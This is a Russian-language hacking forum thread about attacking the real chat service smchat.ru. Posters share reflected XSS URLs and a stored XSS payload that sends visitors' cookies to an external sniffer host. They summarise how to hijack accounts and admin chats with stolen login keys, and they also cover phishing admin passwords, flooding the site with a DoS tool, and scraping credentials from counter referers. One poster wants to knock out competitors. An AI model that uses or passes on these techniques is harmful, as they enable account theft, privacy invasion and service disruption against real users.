Помогите плз ломануть www.smchat.ru.у меня несколько вопросов,ответьте на какие сможете:Как его ломануть или чаты на нём?Как утащить админство или узнать пароли админа?Как узнать айпи если ты не модер?Какие проги есть для его взлома или флуда?

Я знаю как узнать Ip, если ты не модер, причём Ip любого юзера в чате и не только в твоем, а в любом (в этой системе).. но это думаю потом.. =) Полчше изучу движочек ихней на досуге)

Изучи плз и скажи как и что...Как айпи узнать?

Да подскажите что нибудь по этой теме...
А именно как дёрнуть чужие куки?

Узнавать ip довольно легко =) создаешь свой чат и в нем пишешь /ip [имя пользователя]

Там на главной странице при отсутствии пользователя в базе данных, выводится, что пользователя с ником ***(че ввели) можно зарегать... На форме стоит ограничение кол-ва вводимых символов...но оно производится путем html то есть если исправить, что все будет тип-топ... времени нет..Кто-нибудь проверьте это на пассифную XSS

Ну чё кто-нибудь может помочь?

Мне один писал что можно зайти под чужим ником через фрейм сообщений, а как?

Вот прочитав всё это ко мне в голову идия пришла =) Система такова. Создаешь сайтик на нем создаешь ip.php заинклудь в индекс и попроси того узера Вглянуть на сайт и посмотреть он работает или нет... При заход на сайт у тебя его ИП в кармане, но в этом всём есть не доработка что он может с прокси зайти! Но попробовать можно!

Вот прочитав всё это ко мне в голову идия пришла =) Система такова. Создаешь сайтик на нем создаешь ip.php заинклудь в индекс и попроси того узера Вглянуть на сайт и посмотреть он работает или нет... При заход на сайт у тебя его ИП в кармане, но в этом всём есть не доработка что он может с прокси зайти! Но попробовать можно!
Всё гороздо прощё ставишь персональный сниффер и всё.....
Но не в этом суть, я спрашивал есть ли что нибудь круче чем этот метод?

Вот - http://smchat.ru/chat.php?chatname=Go0oSE"><script>alert(/ok/)</script> пассивная XSS, вот только толку от этого?

И еще - http://smchat.ru/index.php?s=autoriz&login=<script>var%20xss_test=333333333%3Balert(xss_test)%3B</script>&password=1 ; http://smchat.ru/chat.php?chatname=<script>var%20xss_test=222222222%3Balert(xss_test)%3B</script>&login=1&key=1 ; http://smchat.ru/index.php?s=autoriz&login=<script>var%20xss_test=333333333%3Balert(xss_test)%3B</script>&password=1

А я вот впендюрил в логин <script>alert() (т.е. скока влезло) и пасс любой... выскакивает ошибка в 364 строчке...

Еще немного посмотрел, можно посылать сообщения под гостем даже если это запрещено в чате. Заходим под гостем в какой-нибудь чат, сохраняем чат на hdd, правим пути (все как всегда) и меняем название чата на тот в котором хотим писать под гостем. Если разобраться с ключем smchat'а, наверное можно будет писать под любым ником.

Еще немного посмотрел, можно посылать сообщения под гостем даже если это запрещено в чате. Заходим под гостем в какой-нибудь чат, сохраняем чат на hdd, правим пути (все как всегда) и меняем название чата на тот в котором хотим писать под гостем. Если разобраться с ключем smchat'а, наверное можно будет писать под любым ником.
Я заметил что при регистрации нужен ключ, так вот ключ не какой нибудь а он зависит от введённого ника

Все, добился своего =) Создаем свой чат и в настройка в поле Объявления пишем знакомую конструкцию: <script>img=new Image(); img.src="http://s.netsec.ru/moroz/pic.gif?;"+document.cookie;</script>. Просим жертву зайти в свой чат и вам сохраняется его логин и ключ.

Все, добился своего =) Создаем свой чат и в настройка в поле Объявления пишем знакомую конструкцию: <script>img=new Image(); img.src="http://s.netsec.ru/moroz/pic.gif?;"+document.cookie;</script>. Просим жертву зайти в свой чат и вам сохраняется его логин и ключ.
Ой ты прям гений! А то я незнал про это! Зацени первую страницу для начала. Что нибудь бы поинерестнее....

Может и гений! Что "поинерестнее" тебе надо? Может тебе root там нужен? Что там на первой странице? Там нет cookies которые ты "дёрнуть" хочешь! Там есть логин и ключ! Которых достаточно чтобы зайти в чат или изменить его если ты дернул ключ админа!
Итого:1) Чтобы узнать ip надо создать свой чат и в нем написать /ip [имя жертвы].
2) Чтобы зафлудить его вполне можно использовать "Универсальный чатфлудер" - http://forum.antichat.ru/thread16011.html
3) Стащить "пароль" можно создав свой чат и в настройках->Объявления вставить путь к снифферу и заманить жертву на свой чат.
4) Используя логин и ключ можно зайти в чат под жертвой - http://smchat.ru/chat.php?chatname=[имя чата]&login=[логин]&key=[ключ]
5) Если вы заманили админа одного из чатов можно так же изменить настройки чата - http://smchat.ru/index.php?chatname=[имя чата]&login=[логин]&key=[ключ]
6) Все.

Что там на первой странице?

Всё гороздо прощё ставишь персональный сниффер и всё.....
Но не в этом суть, я спрашивал есть ли что нибудь круче чем этот метод?
Вот что я писал, а про то что там сессия, никто и не спорит, а про поитерестнее я имел ввиду то что там можно сделать автомотическую регистрацию, только как?

Все, добился своего =) Создаем свой чат и в настройка в поле Объявления пишем знакомую конструкцию: <script>img=new Image(); img.src="http://s.netsec.ru/moroz/pic.gif?;"+document.cookie;</script>. Просим жертву зайти в свой чат и вам сохраняется его логин и ключ.

Ну ты даёшь..... правда я ничерта не понял про синфер :D

<script>img=new Image(); img.src="http://s.netsec.ru/moroz/pic.gif?;"+document.cookie;</script>. ну вот это как я понял долбучая смесь джиэс и тэга вставки изображения , ну ок, ты в этом плане смыслишь больше по этому спорить не буду, но вот КУДА ЭТО СОХРАНЯЕТСЯ ? ГДЕ МНЕ ПОТОМ ИСКАТЬ ЕГО ЛОГИН и КЛЮЧЬ ? :confused:

регистрируй себе сниффер и смотри логи.

регистрируй себе сниффер и смотри логи.


Мужик, еслиб я ещё знал что такое "сниффер" и с чем его едят, а также хотелось бы знать где его регят и тд :d

может тебе лучше на кулинарный форум пойти?
_http://s.netsec.ru/ вот тут вот регь, а то что то на ачате не региться. и лучше почитай форум побольше, в уязвимостях форумов больше смотри, там это инфы хоть соли.

Хех...... зарегил, спосиб! Для детекта айпишника это конечно сойдёт, но вот где тут кукисы? Я тут нашёл только КУКИШИ :-)))) сделал простую HTML страничку, вставил туда код для "приватизации" кукисов и зашёл в неё... Чтож, айпишник он мне показал мой правильно, не спрю, но вот только кукисов там нема, и у меня ИЕ 6 но не мазила :-))) вот цитата:

Date 04.04.2006 01:36
IP **.**.**.***
Real Ip **.**.**.***
Referer
Query ;
Browser Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.4 (build 01348))

Даже модель моего маил агента узнал, но вот того чего надо нема :-)))))

может тебе лучше на кулинарный форум пойти?


Ну спосибо хоть в бобруйск не послали. на на счёт кулинарного форума, я вообщето имею диплом шефповора французской кухни :d

но вот где тут кукисы?
А там нет кукисов :p
Там сессии, меняешь свои на чужие, и всё, но это при условие что чел не вышел и сессии не закрылись....

А там нет кукисов :p
Там сессии, меняешь свои на чужие, и всё, но это при условие что чел не вышел и сессии не закрылись....


Где там сессии? там айпишник виннда эксплотер и активный интернет пейджер :D

Где там сессии? там айпишник виннда эксплотер и активный интернет пейджер :D
Date 05.04.2006 09:51
IP 234.232.196.50
Real Ip 214.32.196.50
Referer http://www.smchat.ru/ban.php?chatname=******&login=ChesteR_LP&key=6c3uEAIjCy9p5PP
Query ;hotlog=1
Browser Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

создал сниф там непонятно куда втыкать код для кражи кукис?

Примерный код на воровство кукисов выглядит так******

Referer http://www.smchat.ru/ban.php?chatna...6c3uEAIjCy9p5PP
Query ;hotlog=1

как я понял после многоточия идёт какраз то что в кукисы надо присунуть, может это у меня не отобразилось, так как страничка была локальной (в компе у меня) а не на серваке? ну ладно с этим понятно, что для этого нужен кукис эдитор я тоже понял, а вот что за хрень Query ;hotlog=1 ??? :p

что за хрень Query ;hotlog=1
судя по всему это от счётчика _hotlog.ru +)))

Referer [url]http://www.smchat.ru/
как я понял после многоточия идёт какраз то что в кукисы надо присунуть, может это у меня не отобразилось, так как страничка была локальной (в компе у меня) а не на серваке? ну ладно с этим понятно, что для этого нужен кукис эдитор я тоже понял
да после многоточия идёт логин и ключ, авторизовываешся и меняешь свои данные на чужие.
hotlog непонадобится тебе точно. неотобразилось наверное из-за того что страничка была локальной. а кукис эдитор ненужен помоему)

Да, кстати smchat.ru падает при ~320 коннектах в Sprut =) Скачать можно с - nev.h16.ru/sprut.zip

Пробывал закидать этот чат пакетами, получилось,чат подвис но не завис ((.

да с одной стороны это хорошо, поиздеваться над ними, но лучше сразу убить)

Но легче искать глупых админов и забирать их чат так, делаешь страницу наподобее www.msconcord.narod.ru/chat.html и просишь заценить, и пароль админа летит на мыло

срабатывало практически со всеми :p

Да, кстати smchat.ru падает при ~320 коннектах в Sprut =) Скачать можно с - nev.h16.ru/sprut.zip
блин у меня ссылка на него не работает , где мона закачать этот "Sprut" :D

И еще - http://smchat.ru/index.php?s=autoriz&login=<script>var%20xss_test=333333333%3Balert(xss_test)%3B</script>&password=1 ; http://smchat.ru/chat.php?chatname=<script>var%20xss_test=222222222%3Balert(xss_test)%3B</script>&login=1&key=1 ; http://smchat.ru/index.php?s=autoriz&login=<script>var%20xss_test=333333333%3Balert(xss_test)%3B</script>&password=1
хм... не понял, а для чего это нужно? :confused:

блин. тема старая, никто не смотрит

хм... не понял, а для чего это нужно?
Ты не понял для чего нужны xss? Мда.. Тут выложили уязвимости, зачем флудить в этой теме неинформативными постами? Обсуждать больше нечего. Xss найдены, дальше дело за тобой.

Ты не понял для чего нужны xss? Мда.. Тут выложили уязвимости, зачем флудить в этой теме неинформативными постами? Обсуждать больше нечего. Xss найдены, дальше дело за тобой.
блин... но я всё равно не понял чё дальше делать, кто нибудь может поподробнее объяснить? плиз

Я не буду объяснять основы xss и т.д. Пользуйся поиском, на форуме как минимум ~4 хороших статьи про xss. Если и после них ты ничего не поймёшь, то тогда уже видно в тебе проблема

блин... но я всё равно не понял чё дальше делать, кто нибудь может поподробнее объяснить? плиз
вот статьи про XSS
http://forum.antichat.ru/thread20140.html
http://www.forum.antichat.ru/thread11807.html
http://forum.antichat.ru/thread18719-XSS.html
http://forum.antichat.ru/thread20212.html

аа.... это всё легко, типа снифа, я этим уже пользовался....... понятно спасибо.... Если честно я думал есть ли чё получше...

Кстати видел один раз одну фигню, ко мне человек зашёл с ником kill-admin а на снифе чёт типа того :


IP: 194.85.136.6
QUERY: hotlog=1
REFERER: -=ты ребёнок а не хакер=-
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727)

как мона обойти этот или чтоб тоже высветилось на чужом снифе чёнить такое :confused:

Снова поднимается старый вопрос по взлому СМЧАТа! Никто не смог найти чтонить по взлому? Нужно убрать конкурентов,а как не в курсе(((
Помогите плиз!

Обсуждалось уже. Создаёш свой чат. В поле объявления пишешь конструкцию:
<script>img=new Image(); img.src="Your sniffer;"+document.cookie;</script>
Зовёшь жертву "заценить" ваш чат. Всё. Ждёшь печенюшек.

Это я уже давным давно знаю! А "глубже" никто не пробывал копать?

Если знаешь, так что мозги насчёт взлома парить. Пользуйся. Поищу сегодня ксс, может найду что хорошее.

Не парьтеся народ =) сча буду выдавать секреты ... тоесть элементарные истины -) мя дажэ пытать ненужно ...
Слушайте и удивляйтесь =)) :
Мучал я смчаты довольно долго ну и вот однажды ф пияном угаре набрёл я на сайтик proext.com - это щётчики еси хто не в курсе ... и вдруг вспомнил , что на см целый ворох этих щётчикоф ... руки зачасались , во рту пересохло ...
Судорожно начал капать по щётчикам смчата ... один, второй везде пассы на статистике , а вот на proext.com нет пасса ... тоесть заходим на http://top.proext.com/stat/?id=10930&mode=page&page=1 и начинаем мля искать рефереры с кеями и логинами... фсё !
Кому что то не нравица идёт нах, спасибо.

З.Ы. Кто найдёт сикуэл инжэк зареспекчу по самое небалуйся :D

Хуясё, на этом счётчике палются только те кто пользуются такими кнопками как :
[TOP SMChat.Ru] [покинуть чат] или которых удаляют из чата и то не всегда и вообще способ старый .

Старый или новый разницы нет, он зато работает ...
Проще заставить юзверя нажать [TOP SMChat.Ru], чем зайти на твою ссылку или чат -)

Ну с этим я согласен)))) хотя я сразу паролем ломаю а вместе с ник плывут и ася и почта и сайты.

Не всегда плывут сайты и почта ... народ умнеет и делает разные пассы, для разных ресурсов ...

Неумнеет.